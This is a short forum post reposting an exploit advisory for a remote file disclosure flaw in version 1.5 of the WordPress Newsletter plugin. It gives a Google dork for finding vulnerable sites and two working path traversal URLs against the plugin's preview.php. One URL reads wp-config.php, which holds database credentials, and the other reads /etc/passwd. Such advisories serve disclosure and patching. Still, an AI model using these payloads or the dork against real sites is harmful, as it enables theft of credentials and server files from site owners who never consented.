The_Arhitect Posted June 9, 2012 Report Posted June 9, 2012 Wordpress Plugin: Newsletter 1.5 Remote File Disclosure Vulnerability################################################### Description : Wordpress Plugins - Plugin: Newsletter Remote File Disclosure Vulnerability# Version : 1.5# Link : http://wordpress.org/extend/plugins/plugin-newsletter/# Plugins : http://downloads.wordpress.org/plugin/plugin-newsletter.zip# Date : 31-05-2012# Google Dork : inurl:/wp-content/plugins/plugin-newsletter/# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr##################################################Exploit :http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.phpRead source [CTRL-u]http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../../../../../etc/passwdRead source [CTRL-u]Sursa: Wordpress Plugin: Newsletter 1.5 Remote File Disclosure Vulnerability Quote
